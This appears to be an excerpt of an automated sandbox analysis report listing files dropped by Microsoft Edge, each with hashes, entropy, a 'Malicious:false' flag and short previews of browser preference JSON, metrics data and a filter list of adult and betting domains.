                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):45876
                                                                                                                                                                                                      Entropy (8bit):6.087934081503602
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:768:uMkbJrT8IeQc5Ynz7KKGf4UDjvOoFAO48us9oeDar4IYCio67DRo+yM/42cRaLMU:uMk1rT8HgnKfrXqrYFo67VLyMV/Yos8
                                                                                                                                                                                                      MD5:C28E5D8D8A99C87212B1B88C702D2F07
                                                                                                                                                                                                      SHA1:3024E81F23E9255FB6ECBF20FBF991A1BF285ABC
                                                                                                                                                                                                      SHA-256:D39E6994EDCB5D31F8443FF9ED1FE45FF64F92AE9EC4801828AAA379E7D7870A
                                                                                                                                                                                                      SHA-512:0B5F067FBA823266BC14A888BA60FD36358C21A330BFD2C209E8DCCAB1EACDC3AA87A329B1DA46A779B35E22787DD664691CDE1C5CAF2378484AFBF98A949207
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733316801"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):45671
                                                                                                                                                                                                      Entropy (8bit):6.092462762993883
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:768:DDXzgWPsj/qlGJqIY8GB4xaz7KKGf4UDjvOoFAc8us9oeDarN7DRo+yM/42cRaLK:D/Ps+wsI7yOaKfr9N7VLyMV/YoskFoL
                                                                                                                                                                                                      MD5:4C6C525C7CC5D5AB90D340FBFFF1B9A8
                                                                                                                                                                                                      SHA1:581935B6504073EACD86028B863E7E0D12F51BED
                                                                                                                                                                                                      SHA-256:DF96DE9D226462C2242F3CD438744933C1781C759EF46D53A60D51A41295BED8
                                                                                                                                                                                                      SHA-512:0DA38B4476A0B84EA8477387A25A5BB4E7219AE3C67D14D075A2D6A4B9889C077FEF1532680984E5C7E17B64BA6B702BAC20C56162812C4635AFC9111E64CDBF
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733316801"},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0V
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):44743
                                                                                                                                                                                                      Entropy (8bit):6.095472154623554
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xBOKKGf4UDjvOoFAc8us9oeDarN7DRo+yM/42cRaLMk:z/Ps+wsI7yOhfr9N7VLyMV/YoskFo6
                                                                                                                                                                                                      MD5:16285655FDCABAE3294AD4F56058B41B
                                                                                                                                                                                                      SHA1:5DE2AA64EDCCBFA1E27B68D9C3B8B5AB46C2CA1E
                                                                                                                                                                                                      SHA-256:3EF374C9A0186E0D5689BEDC20BC5D22A6583E3E37BA1A2A10E77004439F0E9C
                                                                                                                                                                                                      SHA-512:31BC1A9A12F353D1DE19B6709FFF6C3DD19B773DEFC65F59232059BE5B4F1AAAC7FAF931BC83809D78F8A39C680A40BB29D6C1AB91FEFB711C7270FEA2556D5C
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):107893
                                                                                                                                                                                                      Entropy (8bit):4.640132669903667
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7+:fwUQC5VwBIiElEd2K57P7+
                                                                                                                                                                                                      MD5:18D8F6617A5020376CEDA06FB42C24D5
                                                                                                                                                                                                      SHA1:F921FF53D8E1A065550AD835D89E550FDF448795
                                                                                                                                                                                                      SHA-256:C0E1D05E90044F0F5810E83826BE6449D44234CD601668E5E041FE7F3B2CAB32
                                                                                                                                                                                                      SHA-512:4FC6D77BDE79EB4EA56D8CFAEE5908C6D9233E65AD199C52A7425B76ECE9869466D3BE52E2A20B85FE50ABD712C57D8591DEBDDB9F3CBA45070E3233CC185DA4
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):107893
                                                                                                                                                                                                      Entropy (8bit):4.640132669903667
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7+:fwUQC5VwBIiElEd2K57P7+
                                                                                                                                                                                                      MD5:18D8F6617A5020376CEDA06FB42C24D5
                                                                                                                                                                                                      SHA1:F921FF53D8E1A065550AD835D89E550FDF448795
                                                                                                                                                                                                      SHA-256:C0E1D05E90044F0F5810E83826BE6449D44234CD601668E5E041FE7F3B2CAB32
                                                                                                                                                                                                      SHA-512:4FC6D77BDE79EB4EA56D8CFAEE5908C6D9233E65AD199C52A7425B76ECE9869466D3BE52E2A20B85FE50ABD712C57D8591DEBDDB9F3CBA45070E3233CC185DA4
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):4194304
                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3::
                                                                                                                                                                                                      MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                      SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                      SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                      SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):4194304
                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3::
                                                                                                                                                                                                      MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                      SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                      SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                      SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):4194304
                                                                                                                                                                                                      Entropy (8bit):0.03966366443864612
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:192:nWjF0m5tDRnOAU7Y3JPi6VBKP7fr1gsX4pIS5EvjBzhc5N90f+RQ9abamn:Wx0Ut1bSq16hMKmymn
                                                                                                                                                                                                      MD5:BCFD31911B4B48433E57B638003D95A2
                                                                                                                                                                                                      SHA1:C7B6300BD05B6F823471544ADB34CB858525C0A3
                                                                                                                                                                                                      SHA-256:0BA1433CFCC0A2ADB16609AFF6F78038F3AA3336682E2ADB93E8E80E9B98783C
                                                                                                                                                                                                      SHA-512:7005CBF6DF9FA4463770316E3380AC54EC1357D155D9B33FC961FC1C8191B3FFCFD990B776703B66547400EB666769DE592387AA0D95F8B5AA45CCC288D053D5
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:...@..@...@.....C.].....@................V...U..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".xvgigd20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@...............................0...w..Uu.$r.>.........."....."...24.."."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....l....'@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2........6...... .2................
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):4194304
                                                                                                                                                                                                      Entropy (8bit):0.3937562786089727
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3072:Hl1xygpK1pvCwEWEmENCX5uJckozVyqvWzn4PXKYzEuFg1HFi:7xyvZCRF4X5uekuyqeEKYzEuFaHE
                                                                                                                                                                                                      MD5:893B500393DDE7AC0DA6A7AA9E83F691
                                                                                                                                                                                                      SHA1:E27C4830C867FBA7EB02317CF26D88CF7887925E
                                                                                                                                                                                                      SHA-256:A18151C2D512779E9A90EC3EA34203C8B277ACE1F0C07DFA1576FA62A55F8F88
                                                                                                                                                                                                      SHA-512:C0E6A7F2C12CEF08ED021907551FBBEA547E4CD0312B26600A27B33785104D0EA69C776E963165D44C4F10FF8AFCC5DDDE26AA7FD00E29EE4580191D69996063
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:...@..@...@.....C.].....@...................................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".xvgigd20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@...............................0...w..U?:K.u.$r.>.........."....."...24.."."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....l....'@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2.......,...... .`2............
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):280
                                                                                                                                                                                                      Entropy (8bit):4.16517681506792
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:FiWWltlrPYjpVjP9M4UcLH3RvwAH/llwBVP/Sh/Jzv/jSIHmsdJEU9VUnQll:o1rPWVjWZq3RvtNlwBVsJDL7b/3U
                                                                                                                                                                                                      MD5:8DC22414159B9D3CCEDD25E724812F44
                                                                                                                                                                                                      SHA1:24B1CE93D6BA493BB8DA25FD9677C53029C2022F
                                                                                                                                                                                                      SHA-256:D6274AF9433E03990FD32864D41B3C2EBCF8E4735A49A2E2C8E2C8F878D15FEB
                                                                                                                                                                                                      SHA-512:531FBF97B70950261DCEC63116212BB02CBA5254F623FD632FD9A257AF59009B1352F16362283AA3D479F4710EE7D663BBD5FC8700EF4FD5094F8CAA8CBADC30
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:sdPC.....................!...W.F....+F."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................8889edf7-b09d-4a45-9ea5-adabbfd01bb9............
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):12738
                                                                                                                                                                                                      Entropy (8bit):5.27729597766688
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:192:stZJ99QTryDilbatSuyzszhxyaNP6vkj3q82bV+FiAxOOGPuYJ:stZPGiSuEsVxtJ6pbGiEOv
                                                                                                                                                                                                      MD5:EC4AFD44248532B3A5B77F586D914972
                                                                                                                                                                                                      SHA1:6C0B28A45776310C7E8C9AAE6E68187E2CF8AFB5
                                                                                                                                                                                                      SHA-256:84FF16E2B93F7D8CFE56DA7A1749670D689DA4158EC5040339CF093E119B1D77
                                                                                                                                                                                                      SHA-512:D98436D6BD7F8E5F68053D63A712B1715BDFA22DCEEB3357C468D01341F28F0F372535C382F6FF8FF5D9D5C33689EF75764E705C5019030EB9686BF8645342D7
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377790397289529","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):12903
                                                                                                                                                                                                      Entropy (8bit):5.275184519725958
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:192:stZJ99QTryDilbatSuyMszhxyaNP6vkj3q82bV+FiAmWOgRPuYJ:stZPGiSursVxtJ6pbGiHWOgN
                                                                                                                                                                                                      MD5:CEC4EF8E010E60F3C3B02DCDBDA8B3FD
                                                                                                                                                                                                      SHA1:938B28F9A463C2D0E95B9C4E11061BCDBC41F62A
                                                                                                                                                                                                      SHA-256:3A3C26FE5F797AF043503BD850B547F65FB3CCEE996A552254124563D8A26159
                                                                                                                                                                                                      SHA-512:572419023EDB2C47A9F27E20535BB9E8B6637348C0369ABE5B2912DA87EBB7633B7B533DB364772FC6B2210F1EE9ADE30037F68FE22DC76DD926ADC55F1B635F
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377790397289529","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):40504
                                                                                                                                                                                                      Entropy (8bit):5.56189675820804
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:768:7REGN07pLGLP3hWPHXf/h8F1+UoAYDCx9Tuqh0VfUC9xbog/OVp5mllSRrw2tbZ7:7REGN4cP3hWPHXf/hu1jac5mnSi2tb04
                                                                                                                                                                                                      MD5:447F159138359726600191B4E603006D
                                                                                                                                                                                                      SHA1:CDE6110C55CBE5513ECBC1D319DFF039017CD283
                                                                                                                                                                                                      SHA-256:2C497E6C38FA48B50B0FFD04E0344DC10EA23DB2FAD5EBDF95DCDCBFFDAE89EC
                                                                                                                                                                                                      SHA-512:D873CD7EE72D7BBF8F785CB8538EB214A18F8F4325A59AAAFCF9B5491F371B8465920BE5EFC7A19921C5B45BB36C94317C3FD2916FFF56E3AF2FD3B873BA7E12
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377790396853391","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377790396853391","location":5,"ma
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):25185
                                                                                                                                                                                                      Entropy (8bit):5.572075164956343
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:768:7U+GDhWPHXfGh8F1+UoAYDCx9Tuqh0VfUC9xbog/OV7llVRrw2Opgdtu9:7U+GDhWPHXfGhu1jaInVi23dtO
                                                                                                                                                                                                      MD5:D164ECAC376210C7A2883FB192B4925A
                                                                                                                                                                                                      SHA1:FF2FE5AB129608EBFFCEE9AA17911429AE33AF7E
